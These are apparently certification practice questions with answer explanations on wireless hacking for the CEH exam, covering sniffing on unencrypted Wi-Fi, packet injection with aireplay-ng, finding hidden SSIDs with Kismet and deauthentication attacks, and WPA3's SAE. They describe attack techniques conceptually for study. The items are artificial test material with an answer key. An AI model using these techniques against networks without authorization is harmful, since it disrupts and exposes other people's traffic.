Wireless Network Hacking for Certified Ethical Hacker (CEH)

Sample Practice Questions

1. Question 1

   Which of the following is a potential risk of using unencrypted Wi-Fi networks?
   1. A. Increased network speed
   2. B. Vulnerability to sniffing attacks
   3. C. Automatic software updates
   4. D. Improved signal range
   Explanation

   The correct answer is: B. Vulnerability to sniffing attacks.

   Unencrypted Wi-Fi (open or WEP) sends all traffic in plaintext. Anyone within range with a wireless adapter in monitor mode can sniff (capture) that traffic and read it--passwords, emails, web content, and other sensitive data. So the main risk is vulnerability to sniffing attacks (B). Increased speed (A), automatic updates (C), and improved range (D) are not security risks of unencrypted Wi-Fi; encryption (WPA2/WPA3) does not reduce speed or range in a way that makes --unencrypted-- a benefit. The primary security risk of unencrypted Wi-Fi is sniffing.

2. Question 2

   You are testing a company's wireless network security and want to generate a unique packet injection to test the network's response. Which tool would you ideally use to perform this action?
   1. A. airmon-ng
   2. B. aireplay-ng
   3. C. airodump-ng
   4. D. airdecap-ng
   Explanation

   The correct answer is: B. aireplay-ng.

   aireplay-ng is the Aircrack-ng suite tool for injecting packets into a wireless network. You use it to send crafted or replayed frames (e.g., deauth, ARP replay, custom packets) to test how the network and clients respond. For generating packet injection to test the network--s response, aireplay-ng is the right tool. airmon-ng (A) puts the interface in monitor mode; it does not inject packets. airodump-ng (C) captures and displays traffic; it does not inject. airdecap-ng (D) decrypts captured packets when you have the key; it does not inject. For packet injection, use aireplay-ng.

3. Question 3

   In a penetration testing scenario, you are able to sniff traffic on a wireless network. Which of the following can help you identify the presence of hidden SSIDs?
   1. A. Aircrack-ng
   2. B. Kismet
   3. C. Ettercap
   4. D. Netcat
   Explanation

   The correct answer is: B. Kismet.

   Kismet is a wireless IDS/sniffer that passively monitors 802.11 traffic. When SSID broadcast is disabled (--hidden--), the SSID is still sent in association and reassociation frames when clients connect. Kismet captures and displays these frames, so it can reveal hidden SSIDs from observed client activity. Aircrack-ng (A) is mainly for cracking keys and capturing handshakes; airodump-ng can show --hidden-- until a client associates, but Kismet is often cited as the tool that helps identify hidden SSIDs from sniffed traffic. Ettercap (C) is for LAN MITM, not wireless SSID discovery. Netcat (D) is a network utility. For identifying hidden SSIDs from sniffed traffic, Kismet is the appropriate tool.

4. Question 4

   Which of the following techniques would be most effective for an ethical hacker to discover hidden SSIDs during a wireless network assessment?
   1. A. Deauthentication attack
   2. B. MAC address filtering
   3. C. Signal jamming
   4. D. Evil twin attack
   Explanation

   The correct answer is: A. Deauthentication attack.

   Hidden SSIDs are not broadcast in beacons, but the SSID is still sent in association/reassociation frames when clients connect. A deauthentication attack sends forged deauth frames to disconnect clients from the access point; when they reconnect, they send probe requests and (re)association frames that include the SSID. By capturing traffic during this reconnection, you can discover the hidden SSID. MAC address filtering (B) restricts which devices can connect; it does not reveal SSIDs. Signal jamming (C) disrupts the network and is often out of scope. Evil twin (D) lures clients to a fake AP; it can reveal SSID when clients try to connect but is not the primary --discover hidden SSID-- technique. Deauthentication attack is the most effective technique to force reconnections and capture the hidden SSID.

5. Question 5

   Which of the following is a primary benefit of using WPA3 over WPA2 in wireless networks?
   1. A. Increased data transfer speeds
   2. B. Simplified network configuration
   3. C. Enhanced protection against brute-force attacks
   4. D. Backward compatibility with WEP devices
   Explanation

   The correct answer is: C. Enhanced protection against brute-force attacks.

   WPA3 replaces the PSK (pre-shared key) handshake with SAE (Simultaneous Authentication of Equals), also known as Dragonfly. SAE is resistant to offline dictionary/brute-force attacks on the passphrase: an attacker who captures the handshake cannot run offline password guessing as with WPA2-PSK. So a primary benefit of WPA3 is enhanced protection against brute-force attacks (C). Speed (A) and configuration (B) are not the main security improvement. WEP compatibility (D) is not a WPA3 feature; WPA3 does not aim for WEP backward compatibility. The main security benefit of WPA3 over WPA2 is brute-force resistance via SAE.

Other Certified Ethical Hacker (CEH) domains

• Cloud Computing (10 questions)
• Cryptography (14 questions)
• Information Security and Ethical Hacking Overview (33 questions)
• Mobile, IOT and OT Hacking (14 questions)
• Network and Perimeter Hacking (47 questions)
• Reconnaissance Techniques (24 questions)
• System Hacking Phases (14 questions)
• Web Application Hacking (44 questions)